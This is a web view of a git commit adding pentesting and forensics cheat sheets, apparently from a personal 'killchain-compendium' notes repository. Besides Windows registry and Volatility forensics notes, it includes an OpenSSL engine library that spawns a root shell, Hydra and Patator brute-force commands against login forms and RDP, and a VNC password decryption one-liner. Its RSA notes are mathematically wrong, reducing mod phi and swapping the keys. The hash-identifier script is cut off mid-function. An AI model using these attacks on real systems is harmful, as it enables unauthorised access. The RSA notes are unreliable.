whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

further restructuring

This commit is contained in:
Stefan Friese 2022-11-12 23:18:06 +01:00
parent 980fdf6242
commit 996f65fa61
43 changed files with 2029 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

44
Cryptography/OpenSSL Engine.md Normal file
View File

@ -0,0 +1,44 @@
# OpenSSL Engine
* Hook external libs
* [OpenSSL blog](https://www.openssl.org/blog/blog/2015/10/08/engine-building-lesson-1-a-minimum-useless-engine/)
* Most minimal example
```C
#include <openssl/engine.h>
static int bind(ENGINE *e, const char *id)
{
return 1;
}
IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()
```
* Shell as root
```C
#include <openssl/engine.h>
#include <unistd.h>
static int bind(ENGINE *e, const char *id)
{
setuid(0);
setgid(0);
system("/bin/bash");
}
IMPLEMENT_DYNAMIC_BIND_FN(bind)
IMPLEMENT_DYNAMIC_CHECK_FN()
```
* Compile
```C
gcc -fPIC -o rootshell.o -c rootshell.c
gcc -shared -o rootshell.so -c -lcrytpo rootshell.o
```
* Execute via
```sh
openssl engine -t `pwd`/rootshell.so
```

23
Cryptography/OpenSSL-Cheatsheet.md Normal file
View File

@ -0,0 +1,23 @@
# OpenSSL Cheatsheet
## Extract keys from PFX Cert
* Key and cert form PFX
```sh
openssl pkcs12 -in cert.pfx -nocerts -out key.pem -nodes
openssl pkcs12 -in cert.pfx -out cert.pem -clcerts -nokeys
```
## Extract & Repack PFX Cert
* Extract & Repack with another password, e.g. from `mimikatz` to `cqure`
```sh
openssl pkcs12 -in *.pfx -out temp.pem -nodes
openssl pkcs12 -export -out *.pfx -in temp.pem
```
## Generate Certificate
```sh
openssl req -new -x509 -keyout cert.pem -out cert.pem -days 365 -nodes
```

36
Cryptography/RSA.md Normal file
View File

@ -0,0 +1,36 @@
# RSA
* `p * q = n`
* Coprime Phi is calculated either by [Euler Totient](https://en.wikipedia.org/wiki/Euler's_totient_function) or [greatest common divisor](https://en.wikipedia.org/wiki/Greatest_common_divisor) via [euclidean algorithm](https://crypto.stanford.edu/pbc/notes/numbertheory/euclid.html)
* \\(1 < $\phi$ < n \\)
* There is also $\phi$ = (p-1) * (q-1)
* Encryption, public key `e` is a prime between 2 and phi --> \\( 2 < e < $\phi$ \\)
```python
possible_e = []
for i in range (2, phi):
if gcd(n, i) == 1 and gcd(phi, i) == 1:
possible_e.append()
```
* Decryption, private key `d` --> \\( d * e mod $\phi$ = 1 \\)
```python
possible_d = []
for i in range (phi + 1, phi + foo):
if i * e mod phi == 1 :
possible_d.append()
```
* \\( Cipher = msg ** d mod $\phi$ \\)
* \\( Cleartext = cipher ** e mod $\phi$ )
## Euklid
```python
def gcd(a, b):
if b == 0:
return a
return gcd(b, a % b)
```
## Links
* [Encryption+Decryption](https://www.cs.drexel.edu/~jpopyack/Courses/CSP/Fa17/notes/10.1_Cryptography/RSA_Express_EncryptDecrypt_v2.html)

23
Forensics/Kape.md Normal file
View File

@ -0,0 +1,23 @@
# Kroll Artifact Parser
* Collect and processes artifacts on windows
* Collects from live systems, mounted images and F-response tool
## Targets
* Needs source and target directory, as well as a module to process the files on
* `Target` copies a file into a repository
* `*.tkape` files contains metadata of the files to copy
* `Compound Targets` contain metadata of multiple files in order to get a result quicker
* `!Disable` do not appear in the target list
* `!Local` keep on local
## Modules
* Used on the targeted files
* `*.mkape` files
* Additional binaries are kept in `bin`

48
Forensics/NTFS.md Normal file
View File

@ -0,0 +1,48 @@
# NTFS
* Has the following advantages over FAT
* Journaling
* ACL
* Volume Shadow Copy
* Alternate Data Stream
## Master File Table
* VBR references to `$MFT`
* `$LOGFILE` stores transactions of the file system
* `$UsnJrnl` changed files, and reason for change
## Caching
* File information is cached for frequent use in
```sh
C:\Windows\Prefetch\*.pf
```
* An SQLite database can be found under
```sh
C:\Users\<username>\AppData\Local\ConnectedDevicesPlatform\{randomfolder}\ActivitiesCache.db
```
## Jumplist
* Stores recently used files of applications inside the taskbar
```sh
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations
```
## Shortcut Files
```sh
C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\
C:\Users\<username>\AppData\Roaming\Microsoft\Office\Recent\
```
## Internet Explorer History
```sh
C:\Users\<username>\AppData\Local\Microsoft\Windows\WebCache\WebCacheV*.dat
```
## Removeable Device Setup Log
```sh
C:\Windows\inf\setupapi.dev.log
```

28
Forensics/OLEtools.md Normal file
View File

@ -0,0 +1,28 @@
# oletools & Vmonkey
* Analyze ooxml and ole2 files
* [oletools repo](https://github.com/decalage2/oletools.git)
## Usage
* Check content of a stream
```sh
oledump.py file.doc -Ss <No. of stream>
oledump.py file.doc -Ss <No. of stream> -v
```
```sh
oledump.py -i file.doc
```
```sh
olevba file.doc
```
## Vipermonkey
* For the lazy ones
```sh
vmonkey file.doc
```
## scdbg
* [scdbg repo](https://github.com/dzzie/SCDBG.git)

7
Forensics/References.md Normal file
View File

@ -0,0 +1,7 @@
## Forensics References
## Volatility
[volatility](https://github.com/volatilityfoundation/volatility.git)
[volatility3](https://github.com/volatilityfoundation/volatility3.git)

91
Forensics/Volatility.md Normal file
View File

@ -0,0 +1,91 @@
# Volatility
Search through collected volatile memory dumps, volume and VM images.
Volatility and Volatility 3 have a different syntax. The older one has
higher malware hunting abilities.
* [Cheat sheet](https://downloads.volatilityfoundation.org/releases/2.4/CheatSheet_v2.4.pdf)
* [Hacktricks shee](https://book.hacktricks.xyz/forensics/volatility-examples)
* [Symbol table for Linux and macOS](https://github.com/volatilityfoundation/volatility3#symbol-tables)
## Basic Commands
* Basic Info, find OS profile
```sh
volatility -f <file.iso> imageinfo
volatility -f <file.iso> kdbgscan
```
* Process list
```sh
volatility -f <file.iso> --profile <OSprofile> pslist
```
* List dlls
```sh
volatility -f <file.iso> --profile <OSprofile> dlllist -p <PID>
```
* Last accessed dir
```sh
volatility -f <file.iso> --profile <OSprofile> shellbags
```
### Volatility3
* Basic Info works too, but you have to know the kind of OS anyway
```sh
volatility -f <file.iso> windows.info
```
* Process list, but processes can be hidden. Therefore use ` psscan `
```sh
volatility -f <file.iso> windows.pslist
volatility -f <file.iso> windows.psscan
volatility -f <file.iso> windows.pstree
```
* List dlls, this includes the path of the file
```sh
volatility -f <file.iso> windows.dlllist
```
* Find malicious files, fileless and including files, respectively
```sh
volatility -f <file.iso> windows.malfind
volatility -f <file.iso> windows.vadyarascan
```
* Dump memory map
```sh
volatility -f <file.iso> windows.memmap.Memmap --pid <pid> --dump
```
* Dump and scan files
```sh
windows.dumpfiles.DumpFiles Dumps cached file contents from Windows memory
windows.filescan.FileScan Scans for file objects present in a particular windows. Lists version information from PE files.
```
* Find file handles or mutex
```sh
volatility -f <file.iso> windows.mutex
```
* Malware hunting through hooking
```sh
windows.ssdt.SSDT Lists the system call table. # System Service Descriptor Table
windows.driverirp.DriverIrp List IRPs for drivers in a particular windows memory image.
windows.modules.Modules Lists the loaded kernel modules.
windows.driverscan.DriverScan Scans for drivers present in a particular windows
```
## Plugins
Volatility 3 plugins are named after the specific profile they are used for.
For the most part these are (` macOS.*, windows.*, linux.* `)
* For example
* Truecryptpassphrase
* cmdscan, command history
* shutdowntime

119
Forensics/Windows Registration.md Normal file
View File

@ -0,0 +1,119 @@
# Windows Registry
## Regedit Keys
* HKEY_CURRENT_USER (HKCU), inside HKU
* HKEY_USERS (HKU)
* HKEY_LOCAL_MACHINE (HKLM)
* HKEY_CLASSES_ROOT (HKCR), stored in HKLM and HKU
* `HKEY_CURREN_USER\Software\Classes` for settings of interactive user
* `HKEY_LOCAL_MACHINE\Software\Classes` to change default settings
* HKEY_CURRENT_CONFIG
## Paths
* `C:\Windows\System32\Config`
* Default -> `HKEY_USERS\DEFAULT`
* SAM -> `HKEY_LOCAL_MACHINE\SAM`
* SECURITY -> `HKEY_LOCAL_MACHINE\Security`
* SOFTWARE -> `HKEY_LOCAL_MACHINE\Software`
* SYSTEM -> `HKEY_LOCAL_MACHINE\System`
* `C:\Users\<username>\`
* NTUSER.DAT -> `HKEY_CURRENT_USER` , hidden file
* `C:\Users\<username>\AppData\Local\Microsoft\Windows`
* USRCLASS.DAT -> `HKEY_CURRENT_USER\Sofware\CLASSES`, hidden file
* `C:\Windows\AppCompat\Programs\Amcache.hve`
### Transaction Logs
* Transaction `<name of registry hive>.LOG` of the registry hive
* Saved inside the same directory which is `C:\Windows\System32\Config`, as the hive which was altered.
### Backups
* Saved every ten days
* Look out for recently deleted or modified keys
* `C:\Windows\System32\Config\RegBack`
## Data Acquisition
* Tools
* [Autopsy](https://www.autopsy.com/)
* [FTK Imager](https://www.exterro.com/ftk-imager), does not copy `Amcache.hve`
* [KAPE](https://www.kroll.com/en/services/cyber-risk/incident-response-litigation-support/kroll-artifact-parser-extractor-kape), preserves directory tree
* `Registry Viewer`
* `Zimmerman's Registry Explorer`, uses transaction logs as well
* ` AppCompatCache Parser`
* `RegRipper`, cli and gui
## System Information
* OS Version -> `SOFTWARE\Microsoft\Windows NT\CurrentVersion`
* Computer Name -> `SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName`
* Time Zone `SYSTEM\CurrentControlSet\Control\TimeZoneInformation`
* Network Interfaces -> `SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces`
* Past connected networks -> `SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Unmanaged` and `SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Signatures\Managed`
* Services -> `SYSTEM\CurrentControlSet\Services`
* Service will start at boot with `start` key value `0x02`
* Users, SAM -> `SAM\Domains\Account\Users`
### Control Sets
* `ControlSet001` -> last boot
* `ControlSet002` -> last known good
* `HKLM\SYSTEM\CurrentControlSet` -> live
* Can be found under:
* `SYSTEM\Select\Current` shows the used control set
* `SYSTEM\Select\LastKnownGood`
## Autostart Programs
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\RunOnce`
* `SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce`
* `SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run`
* `SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
## Recent Files
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs`, e.g. xml, pdf, jpg
* Office files -> `NTUSER.DAT\Software\Microsoft\Office\VERSION`, `NTUSER.DAT\Software\Microsoft\Office\15.0\Word`
* Office 365 -> `NTUSER.DAT\Software\Microsoft\Office\VERSION\UserMRU\LiveID_####\FileMRU`
## ShellBags
* `USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\Bags`
* `USRCLASS.DAT\Local Settings\Software\Microsoft\Windows\Shell\BagMRU`
* `NTUSER.DAT\Software\Microsoft\Windows\Shell\BagMRU`
* `NTUSER.DAT\Software\Microsoft\Windows\Shell\Bags`
## Last Open/Saved/Visited Dialog MRUs
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\OpenSavePIDlMRU`
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedPidlMRU`
## Explorer Address/Search Bars
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\TypedPaths`
* `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\WordWheelQuery`
## User Assist
* GUI applications launched by the user
* `NTUSER.DAT\Software\Microsoft\Windows\Currentversion\Explorer\UserAssist\{GUID}\Count`
## Shim Cache
* Application Compatibility, AppCompatCache
* `SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache`
* Use `AppCompatCacheParser.exe --csv <path to save output> -f <path to SYSTEM hive for data parsing> -c <control set to parse>`
### AmCache
* Information about recently run applications on the system
* `C:\Windows\appcompat\Programs\Amcache.hve`
* Last executed app -> `Amcache.hve\Root\File\{Volume GUID}\`
* Saves SHA1 of the last executed app
## Background Activity Monitor/Desktop Activity Moderator BAM/DAM
* Saves full path of executed apps
* `SYSTEM\CurrentControlSet\Services\bam\UserSettings\{SID}`
* `SYSTEM\CurrentControlSet\Services\dam\UserSettings\{SID}`
## Devices
* Identification
* USB -> `SYSTEM\CurrentControlSet\Enum\USBTOR`, `SYSTEM\CurrentControlSet\Enum\USB`
* Device name -> `SOFTWARE\Microsoft\Windows Portable Devices\Devices`
* First time connected -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0064`
* Last time connected -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0066`
* Last removal time -> `SYSTEM\CurrentControlSet\Enum\USBSTOR\Ven_Prod_Version\USBSerial#\Properties\{83da6326-97a6-4088-9453-a19231573b29}\0067`

32
Forensics/iOS.md Normal file
View File

@ -0,0 +1,32 @@
# iOS Devices
## Trust Certificates
* Exchanged between 'Trusted' devices and the charging iOS device.
* iTunes access to the iOS device has elevated permissions using the cert.
* Keychain may be extracted through iTunes.
## Interesting Files
* `ResetCounter.plist`, hard Reset diagnostic counter
* `com.apple.preferences.datetime.plist`
* DB tables
* Atendee
* Task
* Event
* Mail
* Safari
* Cookies
* Pictures
* Addressbook
* SMS
* Voicemail
* WiFi Keys
## Backups
Encrypted and unencrypted backups can be chosen in the iTunes menu.
## Tools
* [iFunbox](https://www.i-funbox.com/en/page-about-us.html)
* [O.MG cable](https://shop.hak5.org/products/o-mg-cable)

23
Hashes/Bruteforce/Patator.md Normal file
View File

@ -0,0 +1,23 @@
# Patator Bruteforcing
* [Lanjelot's Repo](https://github.com/lanjelot/patator/)
## Modules
* Available modules can be found under `patator --help`
* Module specifics can be found via `patator <module> -h`
## Using a Module
* For example `http_fuzz` can be used via
```sh
TARGET_IP=10.0.47.11
CSRF=$(curl -s -c stored.cookie "${IP}/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
SESSION_ID=$(grep PHPSESSID stored.cookie | awk -F ' ' '{print $7}')
echo "The CSRF is: $CSRF"
echo "The PHPSESSID is: $SESSION_ID"
patator.py http_fuzz method=POST --threads=64 timeout=10 url="http://${TARGET_IP}/login.php" 0=passwords.txt body="username=admin&password=FILE0&Login=Login&user_token=${CSRF}" header="Cookie: PHPSESSID=${SESSION_ID}; security=impossible" -x quit:fgrep!=login.php -x ignore:fgrep='Location: login.php' -x
```

6
Hashes/Haiti.md Normal file
View File

@ -0,0 +1,6 @@
# haiti
* Hash Identifier
```sh
haiti <hash>
```

24
Hashes/Hashcat.md Normal file
View File

@ -0,0 +1,24 @@
# Hashcat Utilities
* [Modes](https://hashcat.net/wiki/doku.php?id=example_hashes)
## Wordlists
* Combine wordlists
```sh
combinator wordlist.txt otherwordlist.txt > newwordlist.txt
```
* Create wordlist
```sh
hashcat --force <input.txt> -r /opt/hashcat/rules/best64.rule --stdout > wordlist.txt
```
## Using Masks
* A mask can be set instead of a wordlist, this charset is then brute forced by iterating the charset
* [Masks](https://hashcat.net/wiki/doku.php?id=mask_attack)
* Bruteforcing seven lowerspace characters using `SHA2-384` as an example
```sh
hashcat -m 10800 -a 3 hash.out ?l?l?l?l?l?l?l
```

37
Hashes/Password Cracking/Hydra.md Normal file
View File

@ -0,0 +1,37 @@
# Hydra usage
## Examples
* HTTP post form
```sh
hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
```
* HTTP basic auth
```sh
hydra -l bob -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt -f 10.10.167.239 http-get /protected
```
|Command|Description|
|-------|-----------|
|`hydra -P <wordlist> -v <ip> <protocol>`|Brute force against a protocol of your choice|
|`hydra -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol>`|You can use Hydra to bruteforce usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts)|
|`hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip>`|Attack a Windows Remote Desktop with a password list.|
|`hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'`|Craft a more specific request for Hydra to brute force.|
## Parameter
|Option|Decription|
|------|----------|
|-l|Single username|
|-P|Indicates use the following wordlist|
|http-post-form|indicates the method|
|/login url|the login URL|
|:username|the form field where the username is entered|
|^USER^|tells Hydra to use the username from -l|
|password|the formfield where the password is entered|
|^PASS^|tells Hydra to use the wordlist from -P|
|Login|indicates to Hydra the login failed message|
|Login failed|is the login failure message that the form returns|
|F=incorrect|If this word appears on the page, login failed|
|-V| verbose|

43
Hashes/Password Cracking/John the Ripper.md Normal file
View File

@ -0,0 +1,43 @@
# John The Ripper
* [Formats](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
# Usage
* Example
```sh
john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ./hash.txt --format=raw-sha256 --fork=2
```
## Declaring Structure
* List subformat
```sh
john --list=subformats
```
```sh
john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt ./hash.txt --format=dynamic_85 --fork=2
```
## Rules
* [Rule syntax](https://www.openwall.com/john/doc/RULES.shtml)
* Create a local rules file, e.g. `/etc/john-local.conf` or `/usr/share/john/john-local.conf`
* Create config for mutations, e.g. border mutation
```sh
[List.Rules:border]
$[0-9]$[0-9]
```
* Run john with parameter `--rules=border`
### Existing Rules
* `l33t`, l33tsp34k
* `NT`, case mutation
* Example for `best64`
```sh
john --wordlist=single_password.txt --rules=best64 --stdout > out.txt
```
### Subformats
* Some salted passwords need dynamic rules
```sh
john --list=subformats
```

6
Hashes/Password Cracking/VNC.md Normal file
View File

@ -0,0 +1,6 @@
# VNC Password Decoding
* Found passwords in vnc config files may be decoded via
```sh
echo -n "<key>" | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K 5AB2CDC0BADCAF13F1 -iv 0000000000000000 -d | hexdump -Cv
```

8
Hashes/Password Cracking/sucrack.md Normal file
View File

@ -0,0 +1,8 @@
# sucrack
* [Repo](https://github.com/hemp3l/sucrack.git)
* Upload to target and build
```sh
sucrack -u <username> -w 100 <wordlist>
```

19
Hashes/References.md Normal file
View File

@ -0,0 +1,19 @@
# Hashes References
## Password and Username Generation
[exrex](https://github.com/asciimoo/exrex.git)
[namely](https://github.com/OrielOrielOriel/namely.git)
## Password Cracking
[Colabcat](https://github.com/someshkar/colabcat.git)
## Default Passwords
[default-password](https://default-password.info)
[datarecovery](https://datarecovery.com/rd/default-passwords/)
## Wordlist Manager
[wordlistctl](https://github.com/BlackArch/wordlistctl.git)

592
Hashes/Scripts/hash-id.py Normal file
View File

@ -0,0 +1,592 @@
#!/usr/bin/env python
# encoding: utf-8
# Hash Identifier
# By Zion3R
# www.Blackploit.com
# Root@Blackploit.com
from builtins import input
from sys import argv, exit
version = 1.2
logo=''' #########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v'''+str(version)+''' #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################'''
algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"}
# hash.islower() minusculas
# hash.isdigit() numerico
# hash.isalpha() letras
# hash.isalnum() alfanumerico
def CRC16(hash):
hs='4607'
if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("101020")
def CRC16CCITT(hash):
hs='3d08'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("101040")
def FCS16(hash):
hs='0e5b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("101060")
def CRC32(hash):
hs='b33fd057'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("102040")
def ADLER32(hash):
hs='0607cb42'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("102020")
def CRC32B(hash):
hs='b764a0d9'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("102060")
def XOR32(hash):
hs='0000003f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("102080")
def GHash323(hash):
hs='80000000'
if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("103040")
def GHash325(hash):
hs='85318985'
if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("103020")
def DESUnix(hash):
hs='ZiY8YtDKXJwYQ'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False:
jerar.append("104020")
def MD5Half(hash):
hs='ae11fd697ec92c7c'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("105060")
def MD5Middle(hash):
hs='7ec92c7c98de3fac'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("105040")
def MySQL(hash):
hs='63cea4673fd25f46'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("105020")
def DomainCachedCredentials(hash):
hs='f42005ec1afe77967cbc83dce1b4d714'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106025")
def Haval128(hash):
hs='d6e3ec49aa0f138a619f27609022df10'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106160")
def Haval128HMAC(hash):
hs='3ce8b0ffd75bc240fc7d967729cd6637'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106165")
def MD2(hash):
hs='08bbef4754d98806c373f2cd7d9a43c4'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106060")
def MD2HMAC(hash):
hs='4b61b72ead2b0eb0fa3b8a56556a6dca'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106120")
def MD4(hash):
hs='a2acde400e61410e79dacbdfc3413151'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106040")
def MD4HMAC(hash):
hs='6be20b66f2211fe937294c1c95d1cd4f'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106100")
def MD5(hash):
hs='ae11fd697ec92c7c98de3fac23aba525'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106020")
def MD5HMAC(hash):
hs='d57e43d2c7e397bf788f66541d6fdef9'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106080")
def MD5HMACWordpress(hash):
hs='3f47886719268dfa83468630948228f6'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106140")
def NTLM(hash):
hs='cc348bace876ea440a28ddaeb9fd3550'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106029")
def RAdminv2x(hash):
hs='baea31c728cbf0cd548476aa687add4b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106027")
def RipeMD128(hash):
hs='4985351cd74aff0abc5a75a0c8a54115'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106180")
def RipeMD128HMAC(hash):
hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106185")
def SNEFRU128(hash):
hs='4fb58702b617ac4f7ca87ec77b93da8a'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106200")
def SNEFRU128HMAC(hash):
hs='59b2b9dcc7a9a7d089cecf1b83520350'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106205")
def Tiger128(hash):
hs='c086184486ec6388ff81ec9f23528727'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106220")
def Tiger128HMAC(hash):
hs='c87032009e7c4b2ea27eb6f99723454b'
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
jerar.append("106225")
def md5passsalt(hash):
hs='5634cc3b922578434d6e9342ff5913f7'
